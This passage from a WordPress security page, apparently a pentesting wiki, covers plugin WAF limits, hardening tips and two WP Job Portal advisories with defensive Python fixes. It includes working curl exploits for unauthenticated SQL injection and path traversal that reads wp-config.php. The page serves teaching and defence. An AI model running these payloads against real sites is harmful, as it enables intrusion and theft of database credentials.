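    del actor.meta[META_KEY]            # single use: a second restore with the same token fails
    return True


def on_profile_update(user: User, new_roles: set) -> None:
    """A real role change (made by an administrator) discards any stored original roles."""
    user.roles = set(new_roles)
    user.meta.pop(META_KEY, None)


def stale_restore_scenario() -> dict:
    """Admin switches view, is then demoted for real; the old token must not restore admin."""
    alice = User("alice", {"administrator"})
    token = switch_role(alice, "subscriber")
    on_profile_update(alice, {"subscriber"})
    restored = restore_role(alice, token)
    return {"restored": restored, "roles": sorted(alice.roles)}


if __name__ == "__main__":
    print(stale_restore_scenario())
```

The token plays the role the page's missing nonce would play in the plugin, but bound to the stored state rather than to a page load; because the actor temporarily lacks manage_options while switched, the token (not a capability check) is what authorises the restore, which is why it must be unguessable, single-use and cleared on any genuine role change.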

WAF considerations for WordPress/plugin CVEs

Generic edge/server WAFs are tuned for broad patterns (SQLi, XSS, LFI). Many high-impact WordPress/plugin flaws are application-specific logic/auth bugs that look like benign traffic unless the engine understands WordPress routes and plugin semantics.

Offensive notes

  • Target plugin-specific endpoints with clean payloads: admin-ajax.php?action=..., wp-json/<namespace>/<route>, custom file handlers, shortcodes.
  • Exercise unauthenticated paths first (AJAX nopriv, REST with a permissive permission_callback, public shortcodes). Default payloads often succeed without obfuscation.
  • Typical high-impact cases: privilege escalation (broken access control), arbitrary file upload/download, LFI, open redirect.

Defensive notes

  • Don't rely on generic WAF signatures to protect plugin CVEs. Implement application-layer, vulnerability-specific virtual patches or update quickly.
  • Prefer positive-security checks in code (capabilities, nonces, strict input validation) over negative regex filters.

WordPress Protection

Regular Updates

Make sure WordPress, plugins, and themes are up to date. Also confirm that automated updating is enabled in wp-config.php:

php
define( 'WP_AUTO_UPDATE_CORE', true );
add_filter( 'auto_update_plugin', '__return_true' );
add_filter( 'auto_update_theme', '__return_true' );

Also, only install trustworthy WordPress plugins and themes.

Security Plugins

Other Recommendations

  • Remove the default admin user
  • Use strong passwords and 2FA
  • Periodically review users' permissions
  • Limit login attempts to prevent Brute Force attacks
  • Rename the wp-admin.php file and only allow access internally or from certain IP addresses.

Unauthenticated SQL Injection via insufficient validation (WP Job Portal <= 2.3.2)

The WP Job Portal recruitment plugin exposed a savecategory task that ends up executing the following vulnerable code inside modules/category/model.php::validateFormData():

php
$category  = WPJOBPORTALrequest::getVar('parentid');
$inquery   = ' ';
if ($category) {
    $inquery .= " WHERE parentid = $category ";   // <-- direct concat ✗
}
$query  = "SELECT max(ordering)+1 AS maxordering FROM "
        . wpjobportal::$_db->prefix . "wj_portal_categories " . $inquery; // executed later

Issues introduced by this snippet:

  1. Unsanitised user input – parentid comes straight from the HTTP request.
  2. String concatenation inside the WHERE clause – no is_numeric() / esc_sql() / prepared statement.
  3. Unauthenticated reachability – although the action is executed through admin-post.php, the only check in place is a CSRF nonce (wp_verify_nonce()), which any visitor can harvest from a public page that embeds the [wpjobportal_my_resumes] shortcode.

Exploitation

  1. Grab a fresh nonce:
bash
curl -s https://victim.com/my-resumes/ | grep -oE 'name="_wpnonce" value="[a-f0-9]+' | cut -d'"' -f4
  2. Inject arbitrary SQL by abusing parentid:
bash
curl -X POST https://victim.com/wp-admin/admin-post.php \
     -d 'task=savecategory' \
     -d '_wpnonce=<nonce>' \
     -d 'parentid=0 OR 1=1-- -' \
     -d 'cat_title=pwn' -d 'id='

The response discloses the result of the injected query or alters the database, proving SQLi.
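The difference between the concatenated WHERE clause above and a parameterised one can be reproduced offline. The Python block below is an added example, not code from WP Job Portal: an in-memory SQLite table stands in for wj_portal_categories, `max_ordering_vulnerable` rebuilds the concatenation from the snippet, and `max_ordering_safe` validates parentid as an integer and binds it, so the page's `0 OR 1=1-- -` value is refused instead of executed. The table rows are constructed.

```python
"""Concatenated vs. parameterised query for the savecategory lookup."""
import sqlite3
from typing import Optional

TABLE = "wj_portal_categories"   # the table named in the advisory; rows below are constructed


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the plugin's categories table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(f"CREATE TABLE {TABLE} (id INTEGER, parentid INTEGER, ordering INTEGER)")
    conn.executemany(
        f"INSERT INTO {TABLE} VALUES (?, ?, ?)",
        [(1, 0, 1), (2, 0, 2), (3, 1, 5), (4, 1, 9)],
    )
    return conn


def max_ordering_vulnerable(conn: sqlite3.Connection, parentid: str) -> Optional[int]:
    """Rebuilds the concatenation from the snippet above: the request value lands in the SQL text."""
    inquery = " "
    if parentid:
        inquery += f" WHERE parentid = {parentid} "      # direct concatenation
    query = f"SELECT max(ordering)+1 AS maxordering FROM {TABLE}" + inquery
    return conn.execute(query).fetchone()[0]


def max_ordering_safe(conn: sqlite3.Connection, parentid: str) -> Optional[int]:
    """Validate parentid as an integer and bind it; returns None when the input is rejected."""
    if parentid is None or not parentid.strip().lstrip("-").isdigit():
        return None                                       # a real handler would answer 400 here
    row = conn.execute(
        f"SELECT max(ordering)+1 FROM {TABLE} WHERE parentid = ?", (int(parentid),)
    ).fetchone()
    return row[0] if row[0] is not None else 1


if __name__ == "__main__":
    db = make_db()
    for value in ("0", "0 OR 1=1-- -"):
        print(repr(value), "vulnerable:", max_ordering_vulnerable(db, value),
              "safe:", max_ordering_safe(db, value))
```

With `parentid=0` both functions agree on 3 (the next ordering under parent 0); with the injected value the vulnerable query silently evaluates `parentid = 0 OR 1=1` over the whole table and returns 10, while the safe version refuses the input before any SQL runs. In the WordPress world the equivalent is `$wpdb->prepare()` with a `%d` placeholder after an `is_numeric()` check.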

Unauthenticated Arbitrary File Download / Path Traversal (WP Job Portal <= 2.3.2)

Another task, downloadcustomfile, allowed visitors to download any file from disk via path traversal. The vulnerable sink is located in modules/customfield/model.php::downloadCustomUploadedFile():

php
$file = $path . '/' . $file_name;
...
echo $wp_filesystem->get_contents($file); // raw file output

$file_name is attacker-controlled and concatenated without sanitisation. Again, the only gate is a CSRF nonce that can be fetched from the resume page.

Exploitation

bash
curl -G https://victim.com/wp-admin/admin-post.php \
     --data-urlencode 'task=downloadcustomfile' \
     --data-urlencode '_wpnonce=<nonce>' \
     --data-urlencode 'upload_for=resume' \
     --data-urlencode 'entity_id=1' \
     --data-urlencode 'file_name=../../../wp-config.php'

The server responds with the contents of wp-config.php, leaking DB credentials and auth keys.
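Both the Litho deletion handler earlier on this page and this download sink fail for the same reason: a request-controlled name is joined to a directory without confirming that the result stays inside it. The Python function below is an added example, not code from either the theme or the plugin: it models the containment check (single path component first, then a realpath comparison, the same idea as the realpath() plus str_starts_with() pair in the Litho hardening above) and runs it against the traversal strings from both advisories, plus a symlink planted inside the uploads tree. The temporary directory tree and the file names are constructed.

```python
"""Path containment for user-supplied file names under an uploads directory."""
import os
import tempfile


class PathEscapeError(ValueError):
    """Raised when a user-supplied name would resolve outside the allowed base directory."""


def resolve_inside(base_dir: str, user_name: str) -> str:
    """Return the real path of base_dir/user_name, or raise PathEscapeError.

    Two layers: the name must be a single path component (no separators,
    no '.'/'..', no NUL), and the resolved path must still sit below the
    resolved base, which also catches symlinks planted inside the tree.
    """
    if not user_name or user_name in (".", "..") or "\x00" in user_name:
        raise PathEscapeError("empty or reserved name")
    if "/" in user_name or "\\" in user_name:
        raise PathEscapeError("separators are not allowed in a file name")
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, user_name))
    # commonpath avoids the 'uploads' vs 'uploads-old' prefix mistake a plain startswith() makes
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PathEscapeError("path escapes base directory")
    return candidate


def demo() -> dict:
    """Exercise the check with the advisories' inputs inside a throwaway directory tree."""
    results = {}
    with tempfile.TemporaryDirectory() as root:
        fonts = os.path.join(root, "wp-content", "uploads", "litho-fonts")
        os.makedirs(fonts)
        with open(os.path.join(root, "wp-config.php"), "w") as fh:
            fh.write("<?php // constructed stand-in for the real config\n")
        with open(os.path.join(fonts, "Open-Sans"), "w") as fh:
            fh.write("font data\n")
        names = ["Open-Sans", "../../../../wp-config.php", "../../../wp-config.php", "..", "Open-Sans\x00.php"]
        try:
            # a symlink inside uploads pointing at the config: only the realpath comparison catches it
            os.symlink(os.path.join(root, "wp-config.php"), os.path.join(fonts, "cfg-link"))
            names.append("cfg-link")
        except (OSError, NotImplementedError):
            pass   # platform without symlink support; the other cases still run
        for name in names:
            try:
                resolve_inside(fonts, name)
                results[name] = "allowed"
            except PathEscapeError as exc:
                results[name] = f"rejected: {exc}"
    return results


if __name__ == "__main__":
    for name, outcome in demo().items():
        print(f"{name!r:32} {outcome}")
```

The separator check alone already stops both curl payloads on this page; the realpath comparison is the second layer that matters when an attacker can create files inside uploads (a symlink or a crafted archive), which is exactly the situation an upload-capable plugin is in.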

References
